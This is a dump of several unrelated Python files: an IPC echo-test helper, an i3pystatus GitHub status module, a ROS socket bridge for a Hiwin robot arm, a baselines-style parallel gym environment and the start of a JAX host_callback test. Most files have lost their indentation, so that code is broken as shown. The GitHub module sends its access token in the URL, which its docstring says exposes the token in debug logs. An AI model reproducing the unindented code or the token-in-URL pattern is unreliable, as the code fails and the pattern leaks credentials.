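# _run_echo_service() in a thread, and exchange one message. Only calls that
# already appear in the tests are used; _echo_round_trip is my own name.
async def _echo_round_trip() -> bytes:
    pipe = make_ipc_channel()
    connected = asyncio.ensure_future(pipe.connect())
    client = Thread(
        target=_run_echo_service,
        args=[make_ipc_channel_client(pipe.out_path, pipe.in_path)],
    )
    client.start()
    try:
        assert await connected, "Failed to connect pipe"
        await pipe.write(b"ping")
        return await pipe.read()  # expected to be b"ping" again
    finally:
        await pipe.close()
        client.join()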
|
github.py
|
import copy
import json
import re
import threading
import time
from urllib.request import urlopen
from i3pystatus import IntervalModule, formatp
from i3pystatus.core import ConfigError
from i3pystatus.core.desktop import DesktopNotification
from i3pystatus.core.util import user_open, internet, require
try:
import requests
HAS_REQUESTS = True
except ImportError:
HAS_REQUESTS = False
API_METHODS_URL = 'https://status.github.com/api.json'
STATUS_URL = 'https://www.githubstatus.com'
NOTIFICATIONS_URL = 'https://github.com/notifications'
ACCESS_TOKEN_AUTH_URL = 'https://api.github.com/notifications?access_token=%s'
BASIC_AUTH_URL = 'https://api.github.com/notifications'
class Github(IntervalModule):
'''
This module checks the GitHub system status, and optionally the number of
unread notifications.
.. versionchanged:: 3.36
Module now checks system status in addition to unread notifications.
.. note::
For notification checking, the following is required:
- The requests_ module must be installed.
- Either ``access_token`` (recommended) or ``username`` and
``password`` must be used to authenticate to GitHub.
Using an access token is the recommended authentication method. Click
here__ to generate a new access token. Fill in the **Token
description** box, and enable the **notifications** scope by checking
the appropriate checkbox. Then, click the **Generate token** button.
.. important::
An access token is the only supported means of authentication for
this module, if `2-factor authentication`_ is enabled.
.. _requests: https://pypi.python.org/pypi/requests
.. __: https://github.com/settings/tokens/new
.. _`2-factor authentication`: https://help.github.com/articles/about-two-factor-authentication/
See here__ for more information on GitHub's authentication API.
.. __: https://developer.github.com/v3/#authentication
If you would rather use a username and password pair, you can either
pass them as arguments when registering the module, or use i3pystatus'
:ref:`credential management <credentials>` support to store them in a
keyring. Keep in mind that if you do not pass a ``username`` or
``password`` parameter when registering the module, i3pystatus will
still attempt to retrieve these values from a keyring if the keyring_
Python module is installed. This could result in i3pystatus aborting
during startup if it cannot find a usable keyring backend. If you do
not plan to use credential management at all in i3pystatus, then you
should either ensure that A) keyring_ is not installed, or B) both
keyring_ and keyrings.alt_ are installed, to avoid this error.
.. _keyring: https://pypi.python.org/pypi/keyring
.. _keyrings.alt: https://pypi.python.org/pypi/keyrings.alt
.. rubric:: Available formatters
* `{status}` — Current GitHub status. This formatter can be different
depending on the current status (``good``, ``minor``, or ``major``).
The content displayed for each of these statuses is defined in the
**status** config option.
* `{unread}` — When there are unread notifications, this formatter will
contain the value of the **unread_marker** config option. When there are
no unread notifications, this formatter will be an empty string.
* `{unread_count}` — The number of unread notifications. When there are no
unread notifications, it will be an empty string.
* `{update_error}` — When an error is encountered updating this module,
this formatter will be set to the value of the **update_error**
config option.
.. rubric:: Click events
This module responds to 4 different click events:
- **Left-click** — Forces an update of the module.
- **Right-click** — Triggers a desktop notification showing the most recent
update to the GitHub status. This is useful when the status changes when
you are away from your computer, so that the updated status can be seen
without visiting the `GitHub Status Dashboard`_. This click event
requires **notify_status** to be set to ``True``.
- **Double left-click** — Opens the GitHub `notifications page`_ in your web
browser.
- **Double right-click** — Opens the `GitHub Status Dashboard`_ in your web
browser.
.. rubric:: Desktop notifications
.. versionadded:: 3.36
If **notify_status** is set to ``True``, a notification will be displayed
when the status reported by the `GitHub Status API`_ changes.
If **notify_unread** is set to ``True``, a notification will be displayed
when new unread notifications are found. Double-clicking the module will
launch the GitHub notifications dashboard in your browser.
.. note::
A notification will be displayed if there was a problem querying the
`GitHub Status API`_, irrespective of whether or not **notify_status**
or **notify_unread** is set to ``True``.
.. rubric:: Example configuration
The below example enables desktop notifications, enables Pango hinting for
differently-colored **update_error** and **refresh_icon** text, and alters
both the status text and the colors used to visually denote the current
status level. It also sets the log level to debug, for troubleshooting
purposes.
.. code-block:: python
status.register(
'github',
log_level=logging.DEBUG,
notify_status=True,
notify_unread=True,
access_token='0123456789abcdef0123456789abcdef01234567',
hints={'markup': 'pango'},
update_error='<span color="#af0000">!</span>',
refresh_icon='<span color="#ff5f00">⟳</span>',
status={
'good': '✓',
'minor': '!',
'major': '!!',
},
colors={
'good': '#008700',
'minor': '#d7ff00',
'major': '#af0000',
},
)
.. note::
Setting debug logging and authenticating with an access token will
include the access token in the log file, as the notification URL is
logged at this level.
.. _`GitHub Status API`: https://status.github.com/api
.. _`GitHub Status Dashboard`: https://status.github.com
.. _`notifications page`: https://github.com/notifications
.. rubric:: Extended string formatting
.. versionadded:: 3.36
This module supports the :ref:`formatp <formatp>` extended string format
syntax. This allows for values to be hidden when they evaluate as False.
The default ``format`` string value for this module makes use of this
syntax to conditionally show the value of the ``update_error`` config value
when the backend encounters an error during an update, but this can also
be used to only show the number of unread notifications when that number is
not **0**. The below example would show the unread count as **(3)** when
there are 3 unread notifications, but would show nothing when there are no
unread notifications.
.. code-block:: python
status.register(
'github',
notify_status=True,
notify_unread=True,
access_token='0123456789abcdef0123456789abcdef01234567',
format='{status}[ ({unread_count})][ {update_error}]'
)
'''
settings = (
('format', 'format string'),
('status', 'Dictionary mapping statuses to the text which represents '
'that status type. This defaults to ``GitHub`` for all '
'status types.'),
('colors', 'Dictionary mapping statuses to the color used to display '
'the status text'),
('refresh_icon', 'Text to display (in addition to any text currently '
'shown by the module) when refreshing the GitHub '
'status. **NOTE:** Depending on how quickly the '
'update is performed, the icon may not be displayed.'),
('update_error', 'Value for the ``{update_error}`` formatter when an '
'error is encountered while checking GitHub status'),
('keyring_backend', 'alternative keyring backend for retrieving '
'credentials'),
('username', ''),
('password', ''),
('access_token', ''),
('unread_marker', 'Defines the string that the ``{unread}`` formatter '
'shows when there are pending notifications'),
('notify_status', 'Set to ``True`` to display a desktop notification '
'on status changes'),
('notify_unread', 'Set to ``True`` to display a desktop notification '
'when new notifications are detected'),
('unread_notification_template',
'String with no more than one ``%d``, which will be replaced by '
'the number of new unread notifications. Useful for those with '
'non-English locales who would like the notification to be in '
'their native language. The ``%d`` can be omitted if desired.'),
('api_methods_url', 'URL from which to retrieve the API endpoint URL '
'which this module will use to check the GitHub '
'Status'),
('status_url', 'The URL to the status page (opened when the module is '
'double-clicked with the right mouse button)'),
('notifications_url', 'The URL to the GitHub notifications page '
'(opened when the module is double-clicked with '
'the left mouse button)'),
)
# Defaults for module configurables
_default_status = {
'good': 'GitHub',
'minor': 'GitHub',
'major': 'GitHub',
}
_default_colors = {
'good': '#2f895c',
'minor': '#f29d50',
'major': '#cc3300',
}
# Module configurables
format = '{status}[ {unread}][ {update_error}]'
status = _default_status
colors = _default_colors
refresh_icon = '⟳'
update_error = '!'
username = ''
password = ''
access_token = ''
unread_marker = '•'
notify_status = False
notify_unread = False
unread_notification_template = 'You have %d new notification(s)'
api_methods_url = API_METHODS_URL
status_url = STATUS_URL
notifications_url = NOTIFICATIONS_URL
# Global configurables
interval = 600
max_error_len = 50
keyring_backend = None
# Other
unread = ''
unknown_color = None
unknown_status = '?'
failed_update = False
previous_status = None
current_status = None
new_unread = None
previous_unread = None
current_unread = None
config_error = None
data = {'status': '',
'unread': 0,
'unread_count': '',
'update_error': ''}
output = {'full_text': '', 'color': None}
# Click events
on_leftclick = ['perform_update']
on_rightclick = ['show_status_notification']
on_doubleleftclick = ['launch_notifications_url']
on_doublerightclick = ['launch_status_url']
@require(internet)
def launch_status_url(self):
self.logger.debug('Launching %s in browser', self.status_url)
user_open(self.status_url)
@require(internet)
def launch_notifications_url(self):
self.logger.debug('Launching %s in browser', self.notifications_url)
user_open(self.notifications_url)
def init(self):
if self.status != self._default_status:
new_status = copy.copy(self._default_status)
new_status.update(self.status)
self.status = new_status
if self.colors != self._default_colors:
new_colors = copy.copy(self._default_colors)
new_colors.update(self.colors)
self.colors = new_colors
self.logger.debug('status = %s', self.status)
self.logger.debug('colors = %s', self.colors)
self.condition = threading.Condition()
self.thread = threading.Thread(target=self.update_loop, daemon=True)
self.thread.start()
def update_loop(self):
try:
self.perform_update()
while True:
with self.condition:
self.condition.wait(self.interval)
self.perform_update()
except Exception:
msg = 'Exception in {thread} at {time}, module {name}'.format(
thread=threading.current_thread().name,
time=time.strftime('%c'),
name=self.__class__.__name__,
)
self.logger.error(msg, exc_info=True)
@require(internet)
def status_api_request(self, url):
self.logger.debug('Making GitHub Status API request to %s', url)
try:
with urlopen(url) as content:
try:
content_type = dict(content.getheaders())['Content-Type']
charset = re.search(r'charset=(.*)', content_type).group(1)
except AttributeError:
charset = 'utf-8'
response_json = content.read().decode(charset).strip()
if not response_json:
self.logger.error('JSON response from %s was blank', url)
return {}
try:
response = json.loads(response_json)
except json.decoder.JSONDecodeError as exc:
self.logger.error('Error loading JSON: %s', exc)
self.logger.debug('JSON text that failed to load: %s',
response_json)
return {}
self.logger.log(5, 'API response: %s', response)
return response
except Exception as exc:
self.logger.error(
'Failed to make API request to %s. Exception follows:', url,
exc_info=True
)
return {}
def detect_status_change(self, response=None):
if response is not None:
# Compare last update to current and exit without displaying a
# notification if one is not needed.
if self.previous_status is None:
# This is the first time status has been updated since
# i3pystatus was started. Set self.previous_status and exit.
self.previous_status = response
return
if response == self.previous_status:
# No change, so no notification
return
self.previous_status = response
if self.previous_status is None:
# The only way this would happen is if we invoked the right-click
# event before we completed the initial status check.
return
self.show_status_notification()
@staticmethod
def notify(message):
return DesktopNotification(title='GitHub', body=message).display()
def skip_notify(self, message):
self.logger.debug(
'Desktop notifications turned off. Skipped notification: %s',
message
)
return False
def show_status_notification(self):
message = self.current_status.get(
'body',
'Missing \'body\' param in API response'
)
return self.skip_notify(message) \
if not self.notify_status \
else self.notify(message)
def show_unread_notification(self):
if '%d' not in self.unread_notification_template:
formatted = self.unread_notification_template
else:
try:
new_unread = len(self.new_unread)
except TypeError:
new_unread = 0
try:
formatted = self.unread_notification_template % new_unread
except TypeError as exc:
self.logger.error(
'Failed to format {0!r}: {1}'.format(
self.unread_notification_template,
exc
)
)
return False
return self.skip_notify(formatted) \
if not self.notify_unread \
else self.notify(formatted)
@require(internet)
def perform_update(self):
self.output['full_text'] = \
self.refresh_icon + self.output.get('full_text', '')
self.failed_update = False
self.update_status()
try:
self.config_error = None
self.update_unread()
except ConfigError as exc:
self.config_error = exc
self.data['update_error'] = self.update_error \
if self.failed_update \
else ''
self.refresh_display()
@require(internet)
def update_status(self):
try:
# Get most recent update
if not hasattr(self, 'last_message_url'):
self.last_message_url = \
self.status_api_request(API_METHODS_URL)['last_message_url']
self.current_status = self.status_api_request(self.last_message_url)
if not self.current_status:
self.failed_update = True
return
self.data['status'] = self.status.get(
self.current_status.get('status'),
self.unknown_status)
if self.previous_status is not None:
if self.current_status != self.previous_status:
self.show_status_notification()
self.previous_status = self.current_status
except Exception:
# Don't let an uncaught exception kill the update thread
self.logger.error(
'Uncaught error occurred while checking GitHub status. '
'Exception follows:', exc_info=True
)
self.failed_update = True
@require(internet)
def update_unread(self):
# Reset the new_unread attribute to prevent spurious notifications
self.new_unread = None
try:
if not self.username and not self.password and not self.access_token:
# Auth not configured
self.logger.debug(
'No auth configured, notifications will not be checked')
return True
if not HAS_REQUESTS:
self.logger.error(
'The requests module is required to check GitHub notifications')
self.failed_update = True
return False
self.logger.debug(
'Checking unread notifications using %s',
'access token' if self.access_token else 'username/password'
)
old_unread_url = None
if self.access_token:
unread_url = ACCESS_TOKEN_AUTH_URL % self.access_token
else:
unread_url = BASIC_AUTH_URL
self.current_unread = set()
page_num = 0
while old_unread_url != unread_url:
old_unread_url = unread_url
page_num += 1
self.logger.debug(
'Reading page %d of notifications (%s)',
page_num, unread_url
)
try:
if self.access_token:
response = requests.get(unread_url)
else:
response = requests.get(
unread_url,
auth=(self.username, self.password)
)
self.logger.log(
5,
'Raw return from GitHub notification check: %s',
response.text)
unread_data = json.loads(response.text)
except (requests.ConnectionError, requests.Timeout) as exc:
self.logger.error(
'Failed to check unread notifications: %s', exc)
self.failed_update = True
return False
except json.decoder.JSONDecodeError as exc:
self.logger.error('Error loading JSON: %s', exc)
self.logger.debug(
'JSON text that failed to load: %s', response.text)
self.failed_update = True
return False
# Bad credentials or some other error
if isinstance(unread_data, dict):
raise ConfigError(
unread_data.get(
'message',
'Unknown error encountered retrieving unread notifications'
)
)
# Update the current count of unread notifications
self.current_unread.update(
[x['id'] for x in unread_data if 'id' in x]
)
# Check 'Link' header for next page of notifications
# (https://tools.ietf.org/html/rfc5988#section-5)
self.logger.debug('Checking for next page of notifications')
try:
link_header = response.headers['Link']
except AttributeError:
self.logger.error(
'No headers present in response. This might be due to '
'an API change in the requests module.'
)
self.failed_update = True
continue
except KeyError:
self.logger.debug('Only one page of notifications present')
continue
else:
# Process 'Link' header
try:
links = requests.utils.parse_header_links(link_header)
except Exception as exc:
self.logger.error(
'Failed to parse \'Link\' header: %s', exc
)
self.failed_update = True
continue
for link in links:
try:
link_rel = link['rel']
if link_rel != 'next':
# Link does not refer to the next page, skip it
continue
# Set the unread_url so that when we reach the top
# of the outer loop, we have a new URL to check.
unread_url = link['url']
break
except TypeError:
# Malformed hypermedia link
self.logger.warning(
'Malformed hypermedia link (%s) in \'Link\' '
'header (%s)', link, links
)
continue
else:
self.logger.debug('No more pages of notifications remain')
if self.failed_update:
return False
self.data['unread_count'] = len(self.current_unread)
self.data['unread'] = self.unread_marker \
if self.data['unread_count'] > 0 \
else ''
if self.previous_unread is not None:
if not self.current_unread.issubset(self.previous_unread):
self.new_unread = self.current_unread - self.previous_unread
if self.new_unread:
self.show_unread_notification()
self.previous_unread = self.current_unread
return True
except ConfigError as exc:
# This will be caught by the calling function
raise exc
except Exception as exc:
# Don't let an uncaught exception kill the update thread
self.logger.error(
'Uncaught error occurred while checking GitHub notifications. '
'Exception follows:', exc_info=True
)
self.failed_update = True
return False
def refresh_display(self):
previous_color = self.output.get('color')
try:
if 'status' in self.current_status:
color = self.colors.get(
self.current_status['status'],
self.unknown_color)
else:
# Failed status update, keep the existing color
color = previous_color
except TypeError:
# Shouldn't get here, but this would happen if this function is
# called before we check the current status for the first time.
color = previous_color
self.output = {'full_text': formatp(self.format, **self.data).strip(),
'color': color}
def run(self):
if self.config_error is not None:
raise self.config_error
|
HiwinRA605_socket_ros_test_20190625191433.py
|
#!/usr/bin/env python3
# license removed for brevity
# Receive commands from the strategy side and forward them to the control PC over a socket
import socket
## multithreading
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' # initial value of the transmitted data
Arm_feedback = 0 # assume the arm is Ready
state_feedback = 0
NAME = 'socket_server'
client_response = 0 # initial value of the response counter
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
return  # PEP 479: raising StopIteration inside a generator becomes a RuntimeError on Python 3.7+
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
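# --- Illustrative sketch (not part of the original control flow) ---
# Minimal standalone usage of the switch/case recipe defined above, independent
# of the robot-arm commands below; the values 1, 2, 3 are arbitrary examples.
def _switch_demo(value):
    for case in switch(value):
        if case(1):
            return "one"
        if case(2, 3):
            return "two or three"
        if case():  # no arguments: default branch, always matches
            return "other"

# _switch_demo(2) -> "two or three", _switch_demo(9) -> "other"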
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------ server side -------
def point_data(req): ## receive pose data sent from the strategy side
global client_response
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ## receive arm-mode data sent from the strategy side
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ## receive speed-mode data sent from the strategy side
socket_cmd.Speedmode = int('%s'%req.Speedmode)
return(1)
# def Grip_Mode(req): ## receive gripper-action data sent from the strategy side
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ## create the server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## keep the node alive
##------------ server side end -------
##---------- socket packet transmission --------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
#start_input=int(input('Press 1 to start transmission, press 3 to quit: ')) # enter the start command
start_input = 1
if start_input==1:
while 1:
##--------------- socket: send arm commands -----------------
if Arm_feedback == 0:
#------- select mode --------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#------- set arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#------- set arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#------- set arm high-speed & safe mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ## switch back to the initial mode state
s.send(data.encode('utf-8')) # send over the socket (encode the str for transmission)
feedback_str = s.recv(1024)
# the arm side reports its state
if str(feedback_str[2]) == '70':# F: arm is Ready to receive the next motion command
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T: arm is busy and cannot execute the next motion command
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6: strategy finished
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
##--------------- socket: send arm commands end -----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##------------- socket packet transmission end --------------##
## multithreading
def thread_test():
socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5 ## switch to the initial mode state
t = threading.Thread(target=thread_test)
t.start() # start the worker thread
socket_server()
t.join()
# Ctrl+K Ctrl+C  Add line comment
# Ctrl+K Ctrl+U  Remove line comment
# Ctrl+] / Ctrl+[  Indent/outdent line
|
parallelEnv.py
|
# taken from openai/baseline
# with minor edits
# see https://github.com/openai/baselines/baselines/common/vec_env/subproc_vec_env.py
#
import numpy as np
import gym
from multiprocessing import Process, Pipe
from abc import ABC, abstractmethod
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class VecEnv(ABC):
"""
An abstract asynchronous, vectorized environment.
"""
def __init__(self, num_envs, observation_space, action_space):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
@abstractmethod
def reset(self):
"""
Reset all the environments and return an array of
observations, or a dict of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
pass
@abstractmethod
def step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
pass
@abstractmethod
def step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a dict of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
pass
@abstractmethod
def close(self):
"""
Clean up the environments' resources.
"""
pass
def step(self, actions):
"""
Step the environments synchronously.
This is available for backwards compatibility.
"""
self.step_async(actions)
return self.step_wait()
def render(self, mode='human'):
# logger.warn('Render not defined for %s' % self)
pass
@property
def unwrapped(self):
if isinstance(self, VecEnvWrapper):
return self.venv.unwrapped
else:
return self
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class parallelEnv(VecEnv):
def __init__(self, env_name='PongDeterministic-v4',
n=4, seed=None,
spaces=None):
env_fns = [gym.make(env_name) for _ in range(n)]
if seed is not None:
for i, e in enumerate(env_fns):
e.seed(i+seed)
"""
envs: list of gym environments to run in subprocesses
adopted from openai baseline
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
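# --- Illustrative sketch (not part of the original module) ---
# Minimal usage of parallelEnv as defined above: spin up a few environments in
# subprocesses, reset them, take one random step in each, then shut everything
# down. The environment id and the helper name are examples only.
def _parallel_env_demo(env_name='PongDeterministic-v4', n=2):
    envs = parallelEnv(env_name=env_name, n=n, seed=0)
    obs = envs.reset()                                  # stacked: (n, *obs_shape)
    actions = [envs.action_space.sample() for _ in range(n)]
    obs, rewards, dones, infos = envs.step(actions)     # step_async + step_wait
    envs.close()
    return obs.shape, rewards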
|
host_callback_test.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import itertools
import logging
import os
import re
import threading
import time
from typing import Callable, Optional, Sequence
from unittest import SkipTest, skipIf
from absl.testing import absltest
from absl.testing import parameterized
from jax import api
from jax.config import config
from jax import dtypes
from jax.experimental import host_callback as hcb
from jax import lax
from jax import numpy as jnp
from jax import test_util as jtu
from jax.lib import xla_bridge
import numpy as np
config.parse_flags_with_absl()
FLAGS = config.FLAGS
class _TestingOutputStream(object):
"""Use as `output_stream` for tests."""
def __init__(self):
self._output = []
self.test_method_name = None
def write(self, what: str) -> None:
print(f"output_stream[{self.test_method_name}]: {what}", end="")
self._output.append(what)
@property
def output(self):
return "".join(self._output)
@property
def output_sorted_by_device(self):
# Assume that the output is a sequence of strings including metadata
# and data, with metadata containing `device: xxx`
by_device = [] # each element is a pair (device, str_list)
for s in self._output:
m = re.match(r'.*device: (\S+)', s)
if m:
by_device.append((m.group(1), []))
by_device[-1][1].append(s)
sorted_by_device = sorted(by_device, key=lambda x: x[0])
return "\n".join(itertools.chain(*[s[1] for s in sorted_by_device]))
def __str__(self):
return "TestingOutputStream"
def reset(self):
self._output = []
testing_stream = _TestingOutputStream()
def fun1(a):
y = hcb.id_print(a * 2., what="a * 2", output_stream=testing_stream)
y = hcb.id_print(y * 3., what="y * 3", output_stream=testing_stream, result=y)
return y ** 2 # Some computation to make the gradient interesting
def fun1_equiv(a): # Numerical equivalent of fun1
return (a * 2.) ** 2
def maybe_print(do_print: bool, arg, what: str, tap_with_device: Optional[bool] = False):
"""Conditionally print on testing_string"""
if do_print:
return hcb.id_print(arg, what=what,
output_stream=testing_stream, tap_with_device=tap_with_device)
else:
return arg
ignore_jit_of_pmap_warning = partial(
jtu.ignore_warning, message=".*jit-of-pmap.*")
def assertMultiLineStrippedEqual(tst: jtu.JaxTestCase,
expected: str, what: str):
"""A variant that preprocesses the string to eliminate non-determinism in
floating point values, and several uninteresting id_tap primitive params.
"""
# Sometimes we get floating points in the output; we round them
def repl_floats(match_group):
matched = match_group.group(0)
if matched == ".": return matched
x = np.around(float(matched), decimals=2)
return f"{x:.2f}"
what = re.sub(r"\-?\d*\.[\-\def]*", repl_floats, what)
what = re.sub(r"output_stream=[^\]\n,]*,?", "", what)
what = re.sub(r"threshold=[^\]\n,]*,?", "", what)
what = re.sub(r"bwd=[^\]\n]*", "", what)
what = re.sub(r"out_trees=[^\]\n]*", "", what)
what = re.sub(r"fwd_jaxpr_thunk=[^\]\n]*", "", what)
what = re.sub(r"jvp_jaxpr_thunk=[^\]\n]*", "", what)
# Empty lines
what = re.sub(r"^\s*\n", "", what, flags=re.MULTILINE)
def repl_func(match_group):
matched = match_group.group(0)
if "function _print_consumer" in matched:
return "tap_func_=_print"
else:
return "..."
what = re.sub(r"tap_func_=([^\]\n,]*),?", repl_func, what)
tst.assertMultiLineStrippedEqual(expected, what)
def helper_set_hlo_dump():
flags_str = os.getenv("XLA_FLAGS", "")
import shutil
dump_dir = "/tmp/xla_dump"
os.environ["XLA_FLAGS"] = f"{flags_str} --xla_dump_to={dump_dir}"
if os.path.isdir(dump_dir):
logging.warning(f"Deleting old XLA dump directory {dump_dir}")
shutil.rmtree(dump_dir)
logging.warning(f"Setting XLA dump directory {dump_dir}")
# Clear any cached backends so new CPU backend will pick up the env var.
xla_bridge.get_backend.cache_clear()
def helper_print_optimized_hlo(fun, *args):
